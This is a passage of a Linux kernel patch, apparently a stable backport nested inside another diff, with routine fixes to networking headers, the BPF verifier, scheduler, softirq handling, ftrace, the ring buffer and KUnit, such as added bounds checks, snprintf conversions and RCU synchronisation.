+@@ -48,6 +48,22 @@ struct sock *__inet6_lookup_established(struct net *net,
+ 					const u16 hnum, const int dif,
+ 					const int sdif);
+ 
++typedef u32 (inet6_ehashfn_t)(const struct net *net,
++			       const struct in6_addr *laddr, const u16 lport,
++			       const struct in6_addr *faddr, const __be16 fport);
++
++inet6_ehashfn_t inet6_ehashfn;
++
++INDIRECT_CALLABLE_DECLARE(inet6_ehashfn_t udp6_ehashfn);
++
++struct sock *inet6_lookup_reuseport(struct net *net, struct sock *sk,
++				    struct sk_buff *skb, int doff,
++				    const struct in6_addr *saddr,
++				    __be16 sport,
++				    const struct in6_addr *daddr,
++				    unsigned short hnum,
++				    inet6_ehashfn_t *ehashfn);
++
+ struct sock *inet6_lookup_listener(struct net *net,
+ 				   struct inet_hashinfo *hashinfo,
+ 				   struct sk_buff *skb, int doff,
+diff --git a/include/net/inet_common.h b/include/net/inet_common.h
+index 4673bbfd2811f..a75333342c4ec 100644
+--- a/include/net/inet_common.h
++++ b/include/net/inet_common.h
+@@ -31,6 +31,8 @@ int inet_dgram_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		       int addr_len, int flags);
+ int inet_accept(struct socket *sock, struct socket *newsock, int flags,
+ 		bool kern);
++void __inet_accept(struct socket *sock, struct socket *newsock,
++		   struct sock *newsk);
+ int inet_send_prepare(struct sock *sk);
+ int inet_sendmsg(struct socket *sock, struct msghdr *msg, size_t size);
+ void inet_splice_eof(struct socket *sock);
+diff --git a/include/net/inet_hashtables.h b/include/net/inet_hashtables.h
+index 99bd823e97f62..ddfa2e67fdb51 100644
+--- a/include/net/inet_hashtables.h
++++ b/include/net/inet_hashtables.h
+@@ -379,6 +379,20 @@ struct sock *__inet_lookup_established(struct net *net,
+ 				       const __be32 daddr, const u16 hnum,
+ 				       const int dif, const int sdif);
+ 
++typedef u32 (inet_ehashfn_t)(const struct net *net,
++			      const __be32 laddr, const __u16 lport,
++			      const __be32 faddr, const __be16 fport);
++
++inet_ehashfn_t inet_ehashfn;
++
++INDIRECT_CALLABLE_DECLARE(inet_ehashfn_t udp_ehashfn);
++
++struct sock *inet_lookup_reuseport(struct net *net, struct sock *sk,
++				   struct sk_buff *skb, int doff,
++				   __be32 saddr, __be16 sport,
++				   __be32 daddr, unsigned short hnum,
++				   inet_ehashfn_t *ehashfn);
++
+ static inline struct sock *
+ 	inet_lookup_established(struct net *net, struct inet_hashinfo *hashinfo,
+ 				const __be32 saddr, const __be16 sport,
+@@ -448,10 +462,6 @@ static inline struct sock *__inet_lookup_skb(struct inet_hashinfo *hashinfo,
+ 			     refcounted);
+ }
+ 
+-u32 inet6_ehashfn(const struct net *net,
+-		  const struct in6_addr *laddr, const u16 lport,
+-		  const struct in6_addr *faddr, const __be16 fport);
+-
+ static inline void sk_daddr_set(struct sock *sk, __be32 addr)
+ {
+ 	sk->sk_daddr = addr; /* alias of inet_daddr */
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index 43173204d6d5e..87a4f334c22a8 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -885,6 +885,8 @@ enum mac80211_tx_info_flags {
+  *	of their QoS TID or other priority field values.
+  * @IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX: first MLO TX, used mostly internally
+  *	for sequence number assignment
++ * @IEEE80211_TX_CTRL_SCAN_TX: Indicates that this frame is transmitted
++ *	due to scanning, not in normal operation on the interface.
+  * @IEEE80211_TX_CTRL_MLO_LINK: If not @IEEE80211_LINK_UNSPECIFIED, this
+  *	frame should be transmitted on the specific link. This really is
+  *	only relevant for frames that do not have data present, and is
+@@ -905,6 +907,7 @@ enum mac80211_tx_control_flags {
+ 	IEEE80211_TX_CTRL_NO_SEQNO		= BIT(7),
+ 	IEEE80211_TX_CTRL_DONT_REORDER		= BIT(8),
+ 	IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX	= BIT(9),
++	IEEE80211_TX_CTRL_SCAN_TX		= BIT(10),
+ 	IEEE80211_TX_CTRL_MLO_LINK		= 0xf0000000,
+ };
+ 
+diff --git a/include/net/netfilter/nf_tables_core.h b/include/net/netfilter/nf_tables_core.h
+index 1223af68cd9a4..990c3767a3509 100644
+--- a/include/net/netfilter/nf_tables_core.h
++++ b/include/net/netfilter/nf_tables_core.h
+@@ -66,16 +66,6 @@ struct nft_payload {
+ 	u8			dreg;
+ };
+ 
+-struct nft_payload_set {
+-	enum nft_payload_bases	base:8;
+-	u8			offset;
+-	u8			len;
+-	u8			sreg;
+-	u8			csum_type;
+-	u8			csum_offset;
+-	u8			csum_flags;
+-};
+-
+ extern const struct nft_expr_ops nft_payload_fast_ops;
+ 
+ extern const struct nft_expr_ops nft_bitwise_fast_ops;
+diff --git a/include/trace/events/asoc.h b/include/trace/events/asoc.h
+index 4d8ef71090af1..97a434d021356 100644
+--- a/include/trace/events/asoc.h
++++ b/include/trace/events/asoc.h
+@@ -12,6 +12,8 @@
+ #define DAPM_DIRECT "(direct)"
+ #define DAPM_ARROW(dir) (((dir) == SND_SOC_DAPM_DIR_OUT) ? "->" : "<-")
+ 
++TRACE_DEFINE_ENUM(SND_SOC_DAPM_DIR_OUT);
++
+ struct snd_soc_jack;
+ struct snd_soc_card;
+ struct snd_soc_dapm_widget;
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index d5d2183730b9f..a17688011440e 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -6730,7 +6730,7 @@ struct bpf_fib_lookup {
+ 
+ 		/* output: MTU value */
+ 		__u16	mtu_result;
+-	};
++	} __attribute__((packed, aligned(2)));
+ 	/* input: L3 device index for lookup
+ 	 * output: device index from FIB lookup
+ 	 */
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 59e6f755f12c6..0cafdefce02dc 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -275,8 +275,7 @@ static inline int io_run_task_work(void)
+ 
+ static inline bool io_task_work_pending(struct io_ring_ctx *ctx)
+ {
+-	return test_thread_flag(TIF_NOTIFY_SIGNAL) ||
+-		!wq_list_empty(&ctx->work_llist);
++	return task_work_pending(current) || !llist_empty(&ctx->work_llist);
+ }
+ 
+ static inline int io_run_task_work_ctx(struct io_ring_ctx *ctx)
+diff --git a/io_uring/nop.c b/io_uring/nop.c
+index d956599a3c1b8..1a4e312dfe510 100644
+--- a/io_uring/nop.c
++++ b/io_uring/nop.c
+@@ -12,6 +12,8 @@
+ 
+ int io_nop_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
++	if (READ_ONCE(sqe->rw_flags))
++		return -EINVAL;
+ 	return 0;
+ }
+ 
+diff --git a/kernel/Makefile b/kernel/Makefile
+index ebc692242b68b..c90ee75eb8043 100644
+--- a/kernel/Makefile
++++ b/kernel/Makefile
+@@ -112,6 +112,7 @@ obj-$(CONFIG_SHADOW_CALL_STACK) += scs.o
+ obj-$(CONFIG_HAVE_STATIC_CALL) += static_call.o
+ obj-$(CONFIG_HAVE_STATIC_CALL_INLINE) += static_call_inline.o
+ obj-$(CONFIG_CFI_CLANG) += cfi.o
++obj-$(CONFIG_NUMA) += numa.o
+ 
+ obj-$(CONFIG_PERF_EVENTS) += events/
+ 
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 18b3f429abe17..1d851e2f48590 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -6492,7 +6492,8 @@ static bool may_update_sockmap(struct bpf_verifier_env *env, int func_id)
+ 	enum bpf_attach_type eatype = env->prog->expected_attach_type;
+ 	enum bpf_prog_type type = resolve_prog_type(env->prog);
+ 
+-	if (func_id != BPF_FUNC_map_update_elem)
++	if (func_id != BPF_FUNC_map_update_elem &&
++	    func_id != BPF_FUNC_map_delete_elem)
+ 		return false;
+ 
+ 	/* It's not possible to get access to a locked struct sock in these
+@@ -6503,6 +6504,11 @@ static bool may_update_sockmap(struct bpf_verifier_env *env, int func_id)
+ 		if (eatype == BPF_TRACE_ITER)
+ 			return true;
+ 		break;
++	case BPF_PROG_TYPE_SOCK_OPS:
++		/* map_update allowed only via dedicated helpers with event type checks */
++		if (func_id == BPF_FUNC_map_delete_elem)
++			return true;
++		break;
+ 	case BPF_PROG_TYPE_SOCKET_FILTER:
+ 	case BPF_PROG_TYPE_SCHED_CLS:
+ 	case BPF_PROG_TYPE_SCHED_ACT:
+@@ -6598,7 +6604,6 @@ static int check_map_func_compatibility(struct bpf_verifier_env *env,
+ 	case BPF_MAP_TYPE_SOCKMAP:
+ 		if (func_id != BPF_FUNC_sk_redirect_map &&
+ 		    func_id != BPF_FUNC_sock_map_update &&
+-		    func_id != BPF_FUNC_map_delete_elem &&
+ 		    func_id != BPF_FUNC_msg_redirect_map &&
+ 		    func_id != BPF_FUNC_sk_select_reuseport &&
+ 		    func_id != BPF_FUNC_map_lookup_elem &&
+@@ -6608,7 +6613,6 @@ static int check_map_func_compatibility(struct bpf_verifier_env *env,
+ 	case BPF_MAP_TYPE_SOCKHASH:
+ 		if (func_id != BPF_FUNC_sk_redirect_hash &&
+ 		    func_id != BPF_FUNC_sock_hash_update &&
+-		    func_id != BPF_FUNC_map_delete_elem &&
+ 		    func_id != BPF_FUNC_msg_redirect_hash &&
+ 		    func_id != BPF_FUNC_sk_select_reuseport &&
+ 		    func_id != BPF_FUNC_map_lookup_elem &&
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index 79e6a5d4c29a1..01f5a019e0f54 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -2185,7 +2185,7 @@ bool current_cpuset_is_being_rebound(void)
+ static int update_relax_domain_level(struct cpuset *cs, s64 val)
+ {
+ #ifdef CONFIG_SMP
+-	if (val < -1 || val >= sched_domain_level_max)
++	if (val < -1 || val > sched_domain_level_max + 1)
+ 		return -EINVAL;
+ #endif
+ 
+diff --git a/kernel/dma/map_benchmark.c b/kernel/dma/map_benchmark.c
+index 0520a8f4fb1df..af661734e8f90 100644
+--- a/kernel/dma/map_benchmark.c
++++ b/kernel/dma/map_benchmark.c
+@@ -101,7 +101,6 @@ static int do_map_benchmark(struct map_benchmark_data *map)
+ 	struct task_struct **tsk;
+ 	int threads = map->bparam.threads;
+ 	int node = map->bparam.node;
+-	const cpumask_t *cpu_mask = cpumask_of_node(node);
+ 	u64 loops;
+ 	int ret = 0;
+ 	int i;
+@@ -122,7 +121,7 @@ static int do_map_benchmark(struct map_benchmark_data *map)
+ 		}
+ 
+ 		if (node != NUMA_NO_NODE)
+-			kthread_bind_mask(tsk[i], cpu_mask);
++			kthread_bind_mask(tsk[i], cpumask_of_node(node));
+ 	}
+ 
+ 	/* clear the old value in the previous benchmark */
+@@ -208,7 +207,8 @@ static long map_benchmark_ioctl(struct file *file, unsigned int cmd,
+ 		}
+ 
+ 		if (map->bparam.node != NUMA_NO_NODE &&
+-		    !node_possible(map->bparam.node)) {
++		    (map->bparam.node < 0 || map->bparam.node >= MAX_NUMNODES ||
++		     !node_possible(map->bparam.node))) {
+ 			pr_err("invalid numa node\n");
+ 			return -EINVAL;
+ 		}
+diff --git a/kernel/irq/cpuhotplug.c b/kernel/irq/cpuhotplug.c
+index 1ed2b1739363b..5ecd072a34fe7 100644
+--- a/kernel/irq/cpuhotplug.c
++++ b/kernel/irq/cpuhotplug.c
+@@ -69,6 +69,14 @@ static bool migrate_one_irq(struct irq_desc *desc)
+ 		return false;
+ 	}
+ 
++	/*
++	 * Complete an eventually pending irq move cleanup. If this
++	 * interrupt was moved in hard irq context, then the vectors need
++	 * to be cleaned up. It can't wait until this interrupt actually
++	 * happens and this CPU was involved.
++	 */
++	irq_force_complete_move(desc);
++
+ 	/*
+ 	 * No move required, if:
+ 	 * - Interrupt is per cpu
+@@ -87,14 +95,6 @@ static bool migrate_one_irq(struct irq_desc *desc)
+ 		return false;
+ 	}
+ 
+-	/*
+-	 * Complete an eventually pending irq move cleanup. If this
+-	 * interrupt was moved in hard irq context, then the vectors need
+-	 * to be cleaned up. It can't wait until this interrupt actually
+-	 * happens and this CPU was involved.
+-	 */
+-	irq_force_complete_move(desc);
+-
+ 	/*
+ 	 * If there is a setaffinity pending, then try to reuse the pending
+ 	 * mask, so the last change of the affinity does not get lost. If
+diff --git a/kernel/numa.c b/kernel/numa.c
+new file mode 100644
+index 0000000000000..67ca6b8585c06
+--- /dev/null
++++ b/kernel/numa.c
+@@ -0,0 +1,26 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++
++#include <linux/printk.h>
++#include <linux/numa.h>
++
++/* Stub functions: */
++
++#ifndef memory_add_physaddr_to_nid
++int memory_add_physaddr_to_nid(u64 start)
++{
++	pr_info_once("Unknown online node for memory at 0x%llx, assuming node 0\n",
++			start);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(memory_add_physaddr_to_nid);
++#endif
++
++#ifndef phys_to_target_node
++int phys_to_target_node(u64 start)
++{
++	pr_info_once("Unknown target node for memory at 0x%llx, assuming node 0\n",
++			start);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(phys_to_target_node);
++#endif
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index b5d5b6cf093a7..6f48f565e3acb 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -1789,7 +1789,7 @@ void show_rcu_tasks_trace_gp_kthread(void)
+ {
+ 	char buf[64];
+ 
+-	sprintf(buf, "N%lu h:%lu/%lu/%lu",
++	snprintf(buf, sizeof(buf), "N%lu h:%lu/%lu/%lu",
+ 		data_race(n_trc_holdouts),
+ 		data_race(n_heavy_reader_ofl_updates),
+ 		data_race(n_heavy_reader_updates),
+diff --git a/kernel/rcu/tree_stall.h b/kernel/rcu/tree_stall.h
+index 7d15b5b5a235a..11a82404a6cee 100644
+--- a/kernel/rcu/tree_stall.h
++++ b/kernel/rcu/tree_stall.h
+@@ -474,7 +474,8 @@ static void print_cpu_stall_info(int cpu)
+ 			rcu_dynticks_in_eqs(rcu_dynticks_snap(cpu));
+ 	rcuc_starved = rcu_is_rcuc_kthread_starving(rdp, &j);
+ 	if (rcuc_starved)
+-		sprintf(buf, " rcuc=%ld jiffies(starved)", j);
++		// Print signed value, as negative values indicate a probable bug.
++		snprintf(buf, sizeof(buf), " rcuc=%ld jiffies(starved)", j);
+ 	pr_err("\t%d-%c%c%c%c: (%lu %s) idle=%04x/%ld/%#lx softirq=%u/%u fqs=%ld%s%s\n",
+ 	       cpu,
+ 	       "O."[!!cpu_online(cpu)],
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 18a4f8f28a25f..d71234729edb4 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -11117,7 +11117,7 @@ static ssize_t cpu_max_write(struct kernfs_open_file *of,
+ {
+ 	struct task_group *tg = css_tg(of_css(of));
+ 	u64 period = tg_get_cfs_period(tg);
+-	u64 burst = tg_get_cfs_burst(tg);
++	u64 burst = tg->cfs_bandwidth.burst;
+ 	u64 quota;
+ 	int ret;
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 91c101ecfef9f..0de8354d5ad0a 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6020,22 +6020,42 @@ static inline void hrtick_update(struct rq *rq)
+ #ifdef CONFIG_SMP
+ static inline bool cpu_overutilized(int cpu)
+ {
+-	unsigned long rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
+-	unsigned long rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
++	unsigned long  rq_util_min, rq_util_max;
++
++	if (!sched_energy_enabled())
++		return false;
++
++	rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
++	rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
+ 
+ 	/* Return true only if the utilization doesn't fit CPU's capacity */
+ 	return !util_fits_cpu(cpu_util_cfs(cpu), rq_util_min, rq_util_max, cpu);
+ }
+ 
+-static inline void update_overutilized_status(struct rq *rq)
++static inline void set_rd_overutilized_status(struct root_domain *rd,
++					      unsigned int status)
+ {
+-	if (!READ_ONCE(rq->rd->overutilized) && cpu_overutilized(rq->cpu)) {
+-		WRITE_ONCE(rq->rd->overutilized, SG_OVERUTILIZED);
+-		trace_sched_overutilized_tp(rq->rd, SG_OVERUTILIZED);
+-	}
++	if (!sched_energy_enabled())
++		return;
++
++	WRITE_ONCE(rd->overutilized, status);
++	trace_sched_overutilized_tp(rd, !!status);
++}
++
++static inline void check_update_overutilized_status(struct rq *rq)
++{
++	/*
++	 * overutilized field is used for load balancing decisions only
++	 * if energy aware scheduler is being used
++	 */
++	if (!sched_energy_enabled())
++		return;
++
++	if (!READ_ONCE(rq->rd->overutilized) && cpu_overutilized(rq->cpu))
++		set_rd_overutilized_status(rq->rd, SG_OVERUTILIZED);
+ }
+ #else
+-static inline void update_overutilized_status(struct rq *rq) { }
++static inline void check_update_overutilized_status(struct rq *rq) { }
+ #endif
+ 
+ /* Runqueue only has SCHED_IDLE tasks enqueued */
+@@ -6147,7 +6167,7 @@ enqueue_task_fair(struct rq *rq, struct task_struct *p, int flags)
+ 	 * and the following generally works well enough in practice.
+ 	 */
+ 	if (!task_new)
+-		update_overutilized_status(rq);
++		check_update_overutilized_status(rq);
+ 
+ enqueue_throttle:
+ 	assert_list_leaf_cfs_rq(rq);
+@@ -9923,19 +9943,14 @@ static inline void update_sd_lb_stats(struct lb_env *env, struct sd_lb_stats *sd
+ 		env->fbq_type = fbq_classify_group(&sds->busiest_stat);
+ 
+ 	if (!env->sd->parent) {
+-		struct root_domain *rd = env->dst_rq->rd;
+-
+ 		/* update overload indicator if we are at root domain */
+-		WRITE_ONCE(rd->overload, sg_status & SG_OVERLOAD);
++		WRITE_ONCE(env->dst_rq->rd->overload, sg_status & SG_OVERLOAD);
+ 
+ 		/* Update over-utilization (tipping point, U >= 0) indicator */
+-		WRITE_ONCE(rd->overutilized, sg_status & SG_OVERUTILIZED);
+-		trace_sched_overutilized_tp(rd, sg_status & SG_OVERUTILIZED);
++		set_rd_overutilized_status(env->dst_rq->rd,
++					   sg_status & SG_OVERUTILIZED);
+ 	} else if (sg_status & SG_OVERUTILIZED) {
+-		struct root_domain *rd = env->dst_rq->rd;
+-
+-		WRITE_ONCE(rd->overutilized, SG_OVERUTILIZED);
+-		trace_sched_overutilized_tp(rd, SG_OVERUTILIZED);
++		set_rd_overutilized_status(env->dst_rq->rd, SG_OVERUTILIZED);
+ 	}
+ 
+ 	update_idle_cpu_scan(env, sum_util);
+@@ -11849,7 +11864,7 @@ static void task_tick_fair(struct rq *rq, struct task_struct *curr, int queued)
+ 		task_tick_numa(rq, curr);
+ 
+ 	update_misfit_status(curr, rq);
+-	update_overutilized_status(task_rq(curr));
++	check_update_overutilized_status(task_rq(curr));
+ 
+ 	task_tick_core(rq, curr);
+ }
+diff --git a/kernel/sched/isolation.c b/kernel/sched/isolation.c
+index 373d42c707bc5..82e2f7fc7c267 100644
+--- a/kernel/sched/isolation.c
++++ b/kernel/sched/isolation.c
+@@ -109,6 +109,7 @@ static void __init housekeeping_setup_type(enum hk_type type,
+ static int __init housekeeping_setup(char *str, unsigned long flags)
+ {
+ 	cpumask_var_t non_housekeeping_mask, housekeeping_staging;
++	unsigned int first_cpu;
+ 	int err = 0;
+ 
+ 	if ((flags & HK_FLAG_TICK) && !(housekeeping.flags & HK_FLAG_TICK)) {
+@@ -129,7 +130,8 @@ static int __init housekeeping_setup(char *str, unsigned long flags)
+ 	cpumask_andnot(housekeeping_staging,
+ 		       cpu_possible_mask, non_housekeeping_mask);
+ 
+-	if (!cpumask_intersects(cpu_present_mask, housekeeping_staging)) {
++	first_cpu = cpumask_first_and(cpu_present_mask, housekeeping_staging);
++	if (first_cpu >= nr_cpu_ids || first_cpu >= setup_max_cpus) {
+ 		__cpumask_set_cpu(smp_processor_id(), housekeeping_staging);
+ 		__cpumask_clear_cpu(smp_processor_id(), non_housekeeping_mask);
+ 		if (!housekeeping.flags) {
+@@ -138,6 +140,9 @@ static int __init housekeeping_setup(char *str, unsigned long flags)
+ 		}
+ 	}
+ 
++	if (cpumask_empty(non_housekeeping_mask))
++		goto free_housekeeping_staging;
++
+ 	if (!housekeeping.flags) {
+ 		/* First setup call ("nohz_full=" or "isolcpus=") */
+ 		enum hk_type type;
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54ea..d404b5d2d842e 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -1436,7 +1436,7 @@ static void set_domain_attribute(struct sched_domain *sd,
+ 	} else
+ 		request = attr->relax_domain_level;
+ 
+-	if (sd->level > request) {
++	if (sd->level >= request) {
+ 		/* Turn off idle balance on this domain: */
+ 		sd->flags &= ~(SD_BALANCE_WAKE|SD_BALANCE_NEWIDLE);
+ 	}
+diff --git a/kernel/softirq.c b/kernel/softirq.c
+index c8a6913c067d9..a47396161843a 100644
+--- a/kernel/softirq.c
++++ b/kernel/softirq.c
+@@ -525,7 +525,7 @@ static inline bool lockdep_softirq_start(void) { return false; }
+ static inline void lockdep_softirq_end(bool in_hardirq) { }
+ #endif
+ 
+-asmlinkage __visible void __softirq_entry __do_softirq(void)
++static void handle_softirqs(bool ksirqd)
+ {
+ 	unsigned long end = jiffies + MAX_SOFTIRQ_TIME;
+ 	unsigned long old_flags = current->flags;
+@@ -580,8 +580,7 @@ asmlinkage __visible void __softirq_entry __do_softirq(void)
+ 		pending >>= softirq_bit;
+ 	}
+ 
+-	if (!IS_ENABLED(CONFIG_PREEMPT_RT) &&
+-	    __this_cpu_read(ksoftirqd) == current)
++	if (!IS_ENABLED(CONFIG_PREEMPT_RT) && ksirqd)
+ 		rcu_softirq_qs();
+ 
+ 	local_irq_disable();
+@@ -601,6 +600,11 @@ asmlinkage __visible void __softirq_entry __do_softirq(void)
+ 	current_restore_flags(old_flags, PF_MEMALLOC);
+ }
+ 
++asmlinkage __visible void __softirq_entry __do_softirq(void)
++{
++	handle_softirqs(false);
++}
++
+ /**
+  * irq_enter_rcu - Enter an interrupt context with RCU watching
+  */
+@@ -931,7 +935,7 @@ static void run_ksoftirqd(unsigned int cpu)
+ 		 * We can safely run softirq on inline stack, as we are not deep
+ 		 * in the task stack here.
+ 		 */
+-		__do_softirq();
++		handle_softirqs(true);
+ 		ksoftirqd_run_end();
+ 		cond_resched();
+ 		return;
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 552956ccb91c8..e9ce45dce31b2 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1565,12 +1565,15 @@ static struct dyn_ftrace *lookup_rec(unsigned long start, unsigned long end)
+ unsigned long ftrace_location_range(unsigned long start, unsigned long end)
+ {
+ 	struct dyn_ftrace *rec;
++	unsigned long ip = 0;
+ 
++	rcu_read_lock();
+ 	rec = lookup_rec(start, end);
+ 	if (rec)
+-		return rec->ip;
++		ip = rec->ip;
++	rcu_read_unlock();
+ 
+-	return 0;
++	return ip;
+ }
+ 
+ /**
+@@ -1583,25 +1586,22 @@ unsigned long ftrace_location_range(unsigned long start, unsigned long end)
+  */
+ unsigned long ftrace_location(unsigned long ip)
+ {
+-	struct dyn_ftrace *rec;
++	unsigned long loc;
+ 	unsigned long offset;
+ 	unsigned long size;
+ 
+-	rec = lookup_rec(ip, ip);
+-	if (!rec) {
++	loc = ftrace_location_range(ip, ip);
++	if (!loc) {
+ 		if (!kallsyms_lookup_size_offset(ip, &size, &offset))
+ 			goto out;
+ 
+ 		/* map sym+0 to __fentry__ */
+ 		if (!offset)
+-			rec = lookup_rec(ip, ip + size - 1);
++			loc = ftrace_location_range(ip, ip + size - 1);
+ 	}
+ 
+-	if (rec)
+-		return rec->ip;
+-
+ out:
+-	return 0;
++	return loc;
+ }
+ 
+ /**
+@@ -6784,6 +6784,8 @@ static int ftrace_process_locs(struct module *mod,
+ 	/* We should have used all pages unless we skipped some */
+ 	if (pg_unuse) {
+ 		WARN_ON(!skipped);
++		/* Need to synchronize with ftrace_location_range() */
++		synchronize_rcu();
+ 		ftrace_free_pages(pg_unuse);
+ 	}
+ 	return ret;
+@@ -6998,6 +7000,9 @@ void ftrace_release_mod(struct module *mod)
+  out_unlock:
+ 	mutex_unlock(&ftrace_lock);
+ 
++	/* Need to synchronize with ftrace_location_range() */
++	if (tmp_page)
++		synchronize_rcu();
+ 	for (pg = tmp_page; pg; pg = tmp_page) {
+ 
+ 		/* Needs to be called outside of ftrace_lock */
+@@ -7332,6 +7337,7 @@ void ftrace_free_mem(struct module *mod, void *start_ptr, void *end_ptr)
+ 	unsigned long start = (unsigned long)(start_ptr);
+ 	unsigned long end = (unsigned long)(end_ptr);
+ 	struct ftrace_page **last_pg = &ftrace_pages_start;
++	struct ftrace_page *tmp_page = NULL;
+ 	struct ftrace_page *pg;
+ 	struct dyn_ftrace *rec;
+ 	struct dyn_ftrace key;
+@@ -7375,12 +7381,8 @@ void ftrace_free_mem(struct module *mod, void *start_ptr, void *end_ptr)
+ 		ftrace_update_tot_cnt--;
+ 		if (!pg->index) {
+ 			*last_pg = pg->next;
+-			if (pg->records) {
+-				free_pages((unsigned long)pg->records, pg->order);
+-				ftrace_number_of_pages -= 1 << pg->order;
+-			}
+-			ftrace_number_of_groups--;
+-			kfree(pg);
++			pg->next = tmp_page;
++			tmp_page = pg;
+ 			pg = container_of(last_pg, struct ftrace_page, next);
+ 			if (!(*last_pg))
+ 				ftrace_pages = pg;
+@@ -7397,6 +7399,11 @@ void ftrace_free_mem(struct module *mod, void *start_ptr, void *end_ptr)
+ 		clear_func_from_hashes(func);
+ 		kfree(func);
+ 	}
++	/* Need to synchronize with ftrace_location_range() */
++	if (tmp_page) {
++		synchronize_rcu();
++		ftrace_free_pages(tmp_page);
++	}
+ }
+ 
+ void __init ftrace_free_init_mem(void)
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 337162e0c3d53..0093fc56ab3ac 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1602,6 +1602,11 @@ static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
+  *
+  * As a safety measure we check to make sure the data pages have not
+  * been corrupted.
++ *
++ * Callers of this function need to guarantee that the list of pages doesn't get
++ * modified during the check. In particular, if it's possible that the function
++ * is invoked with concurrent readers which can swap in a new reader page then
++ * the caller should take cpu_buffer->reader_lock.
+  */
+ static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
+ {
+@@ -2323,8 +2328,12 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 		 */
+ 		synchronize_rcu();
+ 		for_each_buffer_cpu(buffer, cpu) {
++			unsigned long flags;
++
+ 			cpu_buffer = buffer->buffers[cpu];
++			raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
+ 			rb_check_pages(cpu_buffer);
++			raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
+ 		}
+ 		atomic_dec(&buffer->record_disabled);
+ 	}
+diff --git a/kernel/trace/rv/rv.c b/kernel/trace/rv/rv.c
+index 6c97cc2d754aa..d0d49b910474f 100644
+--- a/kernel/trace/rv/rv.c
++++ b/kernel/trace/rv/rv.c
+@@ -245,6 +245,7 @@ static int __rv_disable_monitor(struct rv_monitor_def *mdef, bool sync)
+ 
+ /**
+  * rv_disable_monitor - disable a given runtime monitor
++ * @mdef: Pointer to the monitor definition structure.
+  *
+  * Returns 0 on success.
+  */
+@@ -256,6 +257,7 @@ int rv_disable_monitor(struct rv_monitor_def *mdef)
+ 
+ /**
+  * rv_enable_monitor - enable a given runtime monitor
++ * @mdef: Pointer to the monitor definition structure.
+  *
+  * Returns 0 on success, error otherwise.
+  */
+diff --git a/lib/kunit/try-catch.c b/lib/kunit/try-catch.c
+index f7825991d576a..d9d1df28cc52e 100644
+--- a/lib/kunit/try-catch.c
++++ b/lib/kunit/try-catch.c
+@@ -11,6 +11,7 @@
+ #include <linux/completion.h>
+ #include <linux/kernel.h>
+ #include <linux/kthread.h>
++#include <linux/sched/task.h>
+ 
+ #include "try-catch-impl.h"
+ 
+@@ -65,13 +66,14 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 	try_catch->context = context;
+ 	try_catch->try_completion = &try_completion;
+ 	try_catch->try_result = 0;
+-	task_struct = kthread_run(kunit_generic_run_threadfn_adapter,
+-				  try_catch,
+-				  "kunit_try_catch_thread");
++	task_struct = kthread_create(kunit_generic_run_threadfn_adapter,
++				     try_catch, "kunit_try_catch_thread");
+ 	if (IS_ERR(task_struct)) {
+ 		try_catch->catch(try_catch->context);
+ 		return;
+ 	}
++	get_task_struct(task_struct);
++	wake_up_process(task_struct);
+ 
+ 	time_remaining = wait_for_completion_timeout(&try_completion,
+ 						     kunit_test_timeout());
+@@ -81,6 +83,7 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 		kthread_stop(task_struct);
+ 	}
+ 
++	put_task_struct(task_struct);
+ 	exit_code = try_catch->try_result;
+ 
+ 	if (!exit_code)
+diff --git a/lib/slub_kunit.c b/lib/slub_kunit.c
+index 7a0564d7cb7ae..9384747d90e5f 100644
+--- a/lib/slub_kunit.c
++++ b/lib/slub_kunit.c
+@@ -39,7 +39,7 @@ static void test_next_pointer(struct kunit *test)
+ 
+ 	ptr_addr = (unsigned long *)(p + s->offset);
+ 	tmp = *ptr_addr;
+-	p[s->offset] = 0x12;
++	p[s->offset] = ~p[s->offset];
